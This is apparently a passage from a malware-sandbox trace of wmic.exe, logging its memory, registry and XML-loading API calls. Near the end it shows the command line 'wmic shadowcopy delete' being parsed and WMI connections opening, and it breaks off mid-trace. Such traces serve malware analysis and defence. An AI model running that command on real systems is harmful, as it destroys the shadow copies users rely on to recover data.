(_Size=0xc) returned 0x272a48 [0095.543] SysStringLen (param_1="CONNECT") returned 0x7 [0095.543] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.543] malloc (_Size=0x18) returned 0x272a60 [0095.543] malloc (_Size=0xc) returned 0x272a80 [0095.543] SysStringLen (param_1="CALL") returned 0x4 [0095.543] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.543] SysStringLen (param_1="CALL") returned 0x4 [0095.543] SysStringLen (param_1="CONNECT") returned 0x7 [0095.543] malloc (_Size=0x18) returned 0x27e868 [0095.544] malloc (_Size=0xc) returned 0x272e98 [0095.544] SysStringLen (param_1="PKT") returned 0x3 [0095.544] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.544] SysStringLen (param_1="PKT") returned 0x3 [0095.544] SysStringLen (param_1="NONE") returned 0x4 [0095.544] SysStringLen (param_1="NONE") returned 0x4 [0095.544] SysStringLen (param_1="PKT") returned 0x3 [0095.544] malloc (_Size=0x18) returned 0x27e888 [0095.544] malloc (_Size=0xc) returned 0x272eb0 [0095.544] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0095.544] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.544] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0095.545] SysStringLen (param_1="NONE") returned 0x4 [0095.545] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0095.545] SysStringLen (param_1="PKT") returned 0x3 [0095.545] SysStringLen (param_1="PKT") returned 0x3 [0095.545] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0095.545] malloc (_Size=0x18) returned 0x27e8a8 [0095.545] malloc (_Size=0xc) returned 0x272ec8 [0095.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0095.545] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0095.545] SysStringLen (param_1="PKT") returned 0x3 [0095.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0095.545] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0095.545] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0095.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0095.545] malloc (_Size=0x18) returned 0x27e8c8 [0095.546] malloc (_Size=0x40) returned 0x272ee0 [0095.546] malloc (_Size=0x20a) returned 0x272f28 [0095.546] GetSystemDirectoryW (in: lpBuffer=0x272f28, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0095.546] free (_Block=0x272f28) [0095.546] malloc (_Size=0xc) returned 0x272f28 [0095.546] malloc (_Size=0xc) returned 0x272f40 [0095.546] malloc (_Size=0xc) returned 0x272f58 [0095.546] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0095.546] SysStringLen (param_1="\\wbem\\") returned 0x6 [0095.546] free (_Block=0x272f28) [0095.547] free (_Block=0x272f40) [0095.547] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0095.547] free (_Block=0x272f58) [0095.547] malloc (_Size=0xc) returned 0x272f28 [0095.547] malloc (_Size=0xc) returned 0x272f40 [0095.547] malloc (_Size=0xc) returned 0x272f58 [0095.547] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0095.547] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0095.547] free (_Block=0x272f28) [0095.547] free (_Block=0x272f40) [0095.548] GetCurrentThreadId () returned 0xdb4 [0095.548] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x14f600 | out: phkResult=0x14f600*=0x10c) returned 0x0 [0095.548] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x14f60c, lpcbData=0x14f608*=0x400 | out: lpType=0x0, lpData=0x14f60c*=0x30, lpcbData=0x14f608*=0x4) returned 0x0 [0095.548] _wcsicmp (_String1="0", _String2="1") returned -1 [0095.549] _wcsicmp (_String1="0", _String2="2") returned -2 [0095.549] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x14f608*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x14f608*=0x42) returned 0x0 [0095.549] malloc (_Size=0x86) returned 0x272f70 [0095.549] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x272f70, lpcbData=0x14f608*=0x42 | out: lpType=0x0, lpData=0x272f70*=0x25, lpcbData=0x14f608*=0x42) returned 0x0 [0095.549] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0095.549] malloc (_Size=0x42) returned 0x273000 [0095.549] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0095.549] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x14f60c, lpcbData=0x14f608*=0x400 | out: lpType=0x0, lpData=0x14f60c*=0x36, lpcbData=0x14f608*=0xc) returned 0x0 [0095.549] _wtol (_String="65536") returned 65536 [0095.549] free (_Block=0x272f70) [0095.549] RegCloseKey (hKey=0x0) returned 0x6 [0095.549] CoCreateInstance (in: rclsid=0xa96d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa96d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x14fa9c | out: ppv=0x14fa9c*=0x3e4630) returned 0x0 [0095.601] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x3e4630, xmlSource=0x14fa20*(varType=0x8, wReserved1=0xffff, wReserved2=0x387a, wReserved3=0x77c7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x14fa84 | out: isSuccessful=0x14fa84*=0xffff) returned 0x0 [0097.492] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x3e4630, DOMElement=0x14fa98 | out: DOMElement=0x14fa98) returned 0x0 [0097.493] malloc (_Size=0xc) returned 0x272f28 [0097.494] free (_Block=0x272f28) [0097.494] malloc (_Size=0xc) returned 0x272f28 [0097.494] free (_Block=0x272f28) [0097.495] malloc (_Size=0xc) returned 0x272f28 [0097.495] malloc (_Size=0xc) returned 0x272f40 [0097.495] malloc (_Size=0x18) returned 0x27e8e8 [0097.496] malloc (_Size=0xc) returned 0x273160 [0097.496] free (_Block=0x273160) [0097.496] malloc (_Size=0xc) returned 0x273160 [0097.496] malloc (_Size=0xc) returned 0x273178 [0097.496] SysStringLen (param_1="VALUE") returned 0x5 [0097.496] SysStringLen (param_1="TABLE") returned 0x5 [0097.496] SysStringLen (param_1="TABLE") returned 0x5 [0097.496] SysStringLen (param_1="VALUE") returned 0x5 [0097.496] malloc (_Size=0x18) returned 0x27e908 [0097.497] malloc (_Size=0xc) returned 0x273190 [0097.497] free (_Block=0x273190) [0097.498] malloc (_Size=0xc) returned 0x27fac8 [0097.498] malloc (_Size=0xc) returned 0x27fae0 [0097.498] SysStringLen (param_1="LIST") returned 0x4 [0097.498] SysStringLen (param_1="TABLE") returned 0x5 [0097.498] malloc (_Size=0x18) returned 0x27e928 [0097.499] malloc (_Size=0xc) returned 0x27faf8 [0097.499] free (_Block=0x27faf8) [0097.499] malloc (_Size=0xc) returned 0x27faf8 [0097.499] malloc (_Size=0xc) returned 0x27fb10 [0097.499] SysStringLen (param_1="RAWXML") returned 0x6 [0097.500] SysStringLen (param_1="TABLE") returned 0x5 [0097.500] SysStringLen (param_1="RAWXML") returned 0x6 [0097.500] SysStringLen (param_1="LIST") returned 0x4 [0097.500] SysStringLen (param_1="LIST") returned 0x4 [0097.500] SysStringLen (param_1="RAWXML") returned 0x6 [0097.500] malloc (_Size=0x18) returned 0x27e948 [0097.501] malloc (_Size=0xc) returned 0x27fb28 [0097.501] free (_Block=0x27fb28) [0097.501] malloc (_Size=0xc) returned 0x27fb28 [0097.501] malloc (_Size=0xc) returned 0x27fb40 [0097.501] SysStringLen (param_1="HTABLE") returned 0x6 [0097.501] SysStringLen (param_1="TABLE") returned 0x5 [0097.501] SysStringLen (param_1="HTABLE") returned 0x6 [0097.501] SysStringLen (param_1="LIST") returned 0x4 [0097.501] malloc (_Size=0x18) returned 0x27e968 [0097.502] malloc (_Size=0xc) returned 0x27fb58 [0097.503] free (_Block=0x27fb58) [0097.503] malloc (_Size=0xc) returned 0x27fb58 [0097.503] malloc (_Size=0xc) returned 0x27fb70 [0097.504] SysStringLen (param_1="HFORM") returned 0x5 [0097.504] SysStringLen (param_1="TABLE") returned 0x5 [0097.504] SysStringLen (param_1="HFORM") returned 0x5 [0097.504] SysStringLen (param_1="LIST") returned 0x4 [0097.504] SysStringLen (param_1="HFORM") returned 0x5 [0097.504] SysStringLen (param_1="HTABLE") returned 0x6 [0097.504] malloc (_Size=0x18) returned 0x27e988 [0097.505] malloc (_Size=0xc) returned 0x27fb88 [0097.505] free (_Block=0x27fb88) [0097.505] malloc (_Size=0xc) returned 0x27fb88 [0097.505] malloc (_Size=0xc) returned 0x27fba0 [0097.506] SysStringLen (param_1="XML") returned 0x3 [0097.506] SysStringLen (param_1="TABLE") returned 0x5 [0097.506] SysStringLen (param_1="XML") returned 0x3 [0097.506] SysStringLen (param_1="VALUE") returned 0x5 [0097.506] SysStringLen (param_1="VALUE") returned 0x5 [0097.506] SysStringLen (param_1="XML") returned 0x3 [0097.506] malloc (_Size=0x18) returned 0x27e9a8 [0097.507] malloc (_Size=0xc) returned 0x27fbb8 [0097.507] free (_Block=0x27fbb8) [0097.507] malloc (_Size=0xc) returned 0x27fbb8 [0097.507] malloc (_Size=0xc) returned 0x27fbd0 [0097.507] SysStringLen (param_1="MOF") returned 0x3 [0097.508] SysStringLen (param_1="TABLE") returned 0x5 [0097.508] SysStringLen (param_1="MOF") returned 0x3 [0097.508] SysStringLen (param_1="LIST") returned 0x4 [0097.508] SysStringLen (param_1="MOF") returned 0x3 [0097.508] SysStringLen (param_1="RAWXML") returned 0x6 [0097.508] SysStringLen (param_1="LIST") returned 0x4 [0097.508] SysStringLen (param_1="MOF") returned 0x3 [0097.508] malloc (_Size=0x18) returned 0x27e9c8 [0097.509] malloc (_Size=0xc) returned 0x27fbe8 [0097.509] free (_Block=0x27fbe8) [0097.509] malloc (_Size=0xc) returned 0x27fbe8 [0097.509] malloc (_Size=0xc) returned 0x27fc00 [0097.509] SysStringLen (param_1="CSV") returned 0x3 [0097.510] SysStringLen (param_1="TABLE") returned 0x5 [0097.510] SysStringLen (param_1="CSV") returned 0x3 [0097.510] SysStringLen (param_1="LIST") returned 0x4 [0097.510] SysStringLen (param_1="CSV") returned 0x3 [0097.510] SysStringLen (param_1="HTABLE") returned 0x6 [0097.510] SysStringLen (param_1="CSV") returned 0x3 [0097.510] SysStringLen (param_1="HFORM") returned 0x5 [0097.510] malloc (_Size=0x18) returned 0x27e9e8 [0097.511] malloc (_Size=0xc) returned 0x27fc18 [0097.511] free (_Block=0x27fc18) [0097.511] malloc (_Size=0xc) returned 0x27fc18 [0097.511] malloc (_Size=0xc) returned 0x27fc30 [0097.511] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.511] SysStringLen (param_1="TABLE") returned 0x5 [0097.511] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.512] SysStringLen (param_1="VALUE") returned 0x5 [0097.512] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.512] SysStringLen (param_1="XML") returned 0x3 [0097.512] SysStringLen (param_1="XML") returned 0x3 [0097.512] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.512] malloc (_Size=0x18) returned 0x27ea08 [0097.513] malloc (_Size=0xc) returned 0x27fc48 [0097.513] free (_Block=0x27fc48) [0097.513] malloc (_Size=0xc) returned 0x27fc48 [0097.513] malloc (_Size=0xc) returned 0x27fc60 [0097.513] SysStringLen (param_1="texttablewsys") returned 0xd [0097.513] SysStringLen (param_1="TABLE") returned 0x5 [0097.513] SysStringLen (param_1="texttablewsys") returned 0xd [0097.513] SysStringLen (param_1="XML") returned 0x3 [0097.513] SysStringLen (param_1="texttablewsys") returned 0xd [0097.513] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.514] SysStringLen (param_1="XML") returned 0x3 [0097.514] SysStringLen (param_1="texttablewsys") returned 0xd [0097.514] malloc (_Size=0x18) returned 0x27ea28 [0097.514] malloc (_Size=0xc) returned 0x27fc78 [0097.515] free (_Block=0x27fc78) [0097.515] malloc (_Size=0xc) returned 0x27fc78 [0097.515] malloc (_Size=0xc) returned 0x27fc90 [0097.515] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.515] SysStringLen (param_1="TABLE") returned 0x5 [0097.515] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.515] SysStringLen (param_1="XML") returned 0x3 [0097.515] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.515] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.516] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.516] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.516] malloc (_Size=0x18) returned 0x27ea48 [0097.516] malloc (_Size=0xc) returned 0x27fca8 [0097.517] free (_Block=0x27fca8) [0097.517] malloc (_Size=0xc) returned 0x27fca8 [0097.517] malloc (_Size=0xc) returned 0x27fcc0 [0097.517] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.517] SysStringLen (param_1="TABLE") returned 0x5 [0097.517] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.517] SysStringLen (param_1="XML") returned 0x3 [0097.517] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.517] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.517] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.517] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.517] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.518] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.518] malloc (_Size=0x18) returned 0x27ea68 [0097.624] malloc (_Size=0xc) returned 0x27fcd8 [0097.624] free (_Block=0x27fcd8) [0097.624] malloc (_Size=0xc) returned 0x27fcd8 [0097.624] malloc (_Size=0xc) returned 0x27fcf0 [0097.625] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.625] SysStringLen (param_1="TABLE") returned 0x5 [0097.625] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.625] SysStringLen (param_1="XML") returned 0x3 [0097.625] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.625] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.625] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.625] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.625] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.625] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.625] malloc (_Size=0x18) returned 0x27ea88 [0097.626] malloc (_Size=0xc) returned 0x27fd08 [0097.626] free (_Block=0x27fd08) [0097.626] malloc (_Size=0xc) returned 0x27fd08 [0097.626] malloc (_Size=0xc) returned 0x27fd20 [0097.627] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.627] SysStringLen (param_1="TABLE") returned 0x5 [0097.627] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.627] SysStringLen (param_1="XML") returned 0x3 [0097.627] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.627] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.627] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.627] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.627] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.627] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.627] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.627] malloc (_Size=0x18) returned 0x27eaa8 [0097.628] malloc (_Size=0xc) returned 0x27fd38 [0097.629] free (_Block=0x27fd38) [0097.629] malloc (_Size=0xc) returned 0x27fd38 [0097.629] malloc (_Size=0xc) returned 0x27fd50 [0097.629] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.629] SysStringLen (param_1="TABLE") returned 0x5 [0097.629] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.629] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.629] SysStringLen (param_1="XML") returned 0x3 [0097.629] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.629] SysStringLen (param_1="texttablewsys") returned 0xd [0097.629] SysStringLen (param_1="XML") returned 0x3 [0097.629] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.629] malloc (_Size=0x18) returned 0x27eac8 [0097.630] malloc (_Size=0xc) returned 0x27fd68 [0097.630] free (_Block=0x27fd68) [0097.630] malloc (_Size=0xc) returned 0x27fd68 [0097.631] malloc (_Size=0xc) returned 0x27fd80 [0097.631] SysStringLen (param_1="htable-sortby") returned 0xd [0097.631] SysStringLen (param_1="TABLE") returned 0x5 [0097.631] SysStringLen (param_1="htable-sortby") returned 0xd [0097.631] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.631] SysStringLen (param_1="htable-sortby") returned 0xd [0097.631] SysStringLen (param_1="XML") returned 0x3 [0097.631] SysStringLen (param_1="htable-sortby") returned 0xd [0097.631] SysStringLen (param_1="texttablewsys") returned 0xd [0097.631] SysStringLen (param_1="htable-sortby") returned 0xd [0097.631] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.631] SysStringLen (param_1="XML") returned 0x3 [0097.631] SysStringLen (param_1="htable-sortby") returned 0xd [0097.631] malloc (_Size=0x18) returned 0x27eae8 [0097.632] malloc (_Size=0xc) returned 0x27fd98 [0097.632] free (_Block=0x27fd98) [0097.632] malloc (_Size=0xc) returned 0x27fd98 [0097.632] malloc (_Size=0xc) returned 0x27fdb0 [0097.633] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.633] SysStringLen (param_1="TABLE") returned 0x5 [0097.633] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.633] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.633] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.633] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.633] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.633] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.633] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.633] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.633] malloc (_Size=0x18) returned 0x27eb08 [0097.634] malloc (_Size=0xc) returned 0x27fdc8 [0097.634] free (_Block=0x27fdc8) [0097.634] malloc (_Size=0xc) returned 0x27fdc8 [0097.634] malloc (_Size=0xc) returned 0x27fde0 [0097.634] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.634] SysStringLen (param_1="TABLE") returned 0x5 [0097.635] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.635] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.635] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.635] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.635] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.635] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.635] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.635] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.635] malloc (_Size=0x18) returned 0x27eb28 [0097.636] malloc (_Size=0xc) returned 0x27fdf8 [0097.636] free (_Block=0x27fdf8) [0097.636] malloc (_Size=0xc) returned 0x27fdf8 [0097.636] malloc (_Size=0xc) returned 0x27fe10 [0097.637] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.637] SysStringLen (param_1="TABLE") returned 0x5 [0097.637] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.637] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.637] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.637] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.637] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.637] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.637] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.637] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.637] malloc (_Size=0x18) returned 0x27eb48 [0097.638] malloc (_Size=0xc) returned 0x27fe28 [0097.638] free (_Block=0x27fe28) [0097.638] malloc (_Size=0xc) returned 0x27fe28 [0097.638] malloc (_Size=0xc) returned 0x27fe40 [0097.638] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.638] SysStringLen (param_1="TABLE") returned 0x5 [0097.638] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.639] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.639] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.639] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.639] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.639] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.639] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.639] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.639] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.639] malloc (_Size=0x18) returned 0x27eb68 [0097.640] FreeThreadedDOMDocument:IUnknown:Release (This=0x3e4630) returned 0x0 [0097.640] free (_Block=0x272f58) [0097.640] GetCommandLineW () returned="wmic shadowcopy delete" [0097.640] malloc (_Size=0x30) returned 0x273190 [0097.640] memcpy_s (in: _Destination=0x273190, _DestinationSize=0x2e, _Source=0x4b1976, _SourceSize=0x2e | out: _Destination=0x273190) returned 0x0 [0097.640] malloc (_Size=0xc) returned 0x27fe58 [0097.641] malloc (_Size=0xc) returned 0x27fe70 [0097.641] malloc (_Size=0xc) returned 0x27fe88 [0097.641] malloc (_Size=0xc) returned 0x21d2060 [0097.641] malloc (_Size=0x80) returned 0x21d04a0 [0097.641] GetLocalTime (in: lpSystemTime=0x14fa60 | out: lpSystemTime=0x14fa60*(wYear=0x7e4, wMonth=0x5, wDayOfWeek=0x2, wDay=0x5, wHour=0x1, wMinute=0x11, wSecond=0x2a, wMilliseconds=0x22d)) [0097.641] _vsnwprintf (in: _Buffer=0x21d04a0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x14fa40 | out: _Buffer="05-05-2020T01:17:42") returned 19 [0097.641] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.641] malloc (_Size=0x28) returned 0x2731c8 [0097.641] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.641] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.641] malloc (_Size=0x28) returned 0x2731f8 [0097.641] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.641] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.641] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.641] malloc (_Size=0x16) returned 0x27eb88 [0097.642] lstrlenW (lpString="shadowcopy") returned 10 [0097.642] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0097.642] malloc (_Size=0x16) returned 0x27eba8 [0097.642] malloc (_Size=0x4) returned 0x273228 [0097.642] free (_Block=0x0) [0097.642] free (_Block=0x27eb88) [0097.642] lstrlenW (lpString=" shadowcopy delete") returned 19 [0097.642] malloc (_Size=0xe) returned 0x21d2078 [0097.642] lstrlenW (lpString="delete") returned 6 [0097.642] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0097.642] malloc (_Size=0xe) returned 0x21d2090 [0097.642] malloc (_Size=0x8) returned 0x272f58 [0097.642] memmove_s (in: _Destination=0x272f58, _DestinationSize=0x4, _Source=0x273228, _SourceSize=0x4 | out: _Destination=0x272f58) returned 0x0 [0097.642] free (_Block=0x273228) [0097.642] free (_Block=0x0) [0097.642] free (_Block=0x21d2078) [0097.642] malloc (_Size=0x8) returned 0x273228 [0097.642] lstrlenW (lpString="QUIT") returned 4 [0097.642] lstrlenW (lpString="shadowcopy") returned 10 [0097.642] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0097.643] lstrlenW (lpString="EXIT") returned 4 [0097.643] lstrlenW (lpString="shadowcopy") returned 10 [0097.643] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0097.643] free (_Block=0x273228) [0097.643] WbemLocator:IUnknown:AddRef (This=0xa50828) returned 0x2 [0097.643] malloc (_Size=0x8) returned 0x273228 [0097.643] lstrlenW (lpString="/") returned 1 [0097.643] lstrlenW (lpString="shadowcopy") returned 10 [0097.643] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0097.643] lstrlenW (lpString="-") returned 1 [0097.643] lstrlenW (lpString="shadowcopy") returned 10 [0097.643] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0097.643] lstrlenW (lpString="CLASS") returned 5 [0097.644] lstrlenW (lpString="shadowcopy") returned 10 [0097.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0097.644] lstrlenW (lpString="PATH") returned 4 [0097.644] lstrlenW (lpString="shadowcopy") returned 10 [0097.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0097.644] lstrlenW (lpString="CONTEXT") returned 7 [0097.644] lstrlenW (lpString="shadowcopy") returned 10 [0097.644] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0097.644] lstrlenW (lpString="shadowcopy") returned 10 [0097.644] malloc (_Size=0x16) returned 0x27eb88 [0097.644] lstrlenW (lpString="shadowcopy") returned 10 [0097.644] GetCurrentThreadId () returned 0xdb4 [0097.644] ??0CHString@@QAE@XZ () returned 0x14f9b4 [0097.644] malloc (_Size=0xc) returned 0x21d2078 [0097.644] malloc (_Size=0xc) returned 0x21d20a8 [0097.645] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa50828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xadc1e0 | out: ppNamespace=0xadc1e0*=0xa5d00c) returned 0x0 [0098.606] free (_Block=0x21d20a8) [0098.606] free (_Block=0x21d2078) [0098.606] CoSetProxyBlanket (pProxy=0xa5d00c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0098.607] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.607] GetCurrentThreadId () returned 0xdb4 [0098.607] ??0CHString@@QAE@XZ () returned 0x14f94c [0098.607] malloc (_Size=0xc) returned 0x21d2078 [0098.607] malloc (_Size=0xc) returned 0x21d20a8 [0098.607] malloc (_Size=0xc) returned 0x21d20c0 [0098.607] malloc (_Size=0xc) returned 0x21d20d8 [0098.607] SysStringLen (param_1="root\\cli") returned 0x8 [0098.607] SysStringLen (param_1="\\") returned 0x1 [0098.608] malloc (_Size=0xc) returned 0x21d20f0 [0098.608] SysStringLen (param_1="root\\cli\\") returned 0x9 [0098.608] SysStringLen (param_1="ms_409") returned 0x6 [0098.608] free (_Block=0x21d20d8) [0098.608] free (_Block=0x21d20c0) [0098.608] free (_Block=0x21d20a8) [0098.608] free (_Block=0x21d2078) [0098.608] malloc (_Size=0xc) returned 0x21d2078 [0098.609] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa50828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xadc1e4 | out: ppNamespace=0xadc1e4*=0xa5d064) returned 0x0 [0098.868] free (_Block=0x21d2078) [0098.868] free (_Block=0x21d20f0) [0098.868] 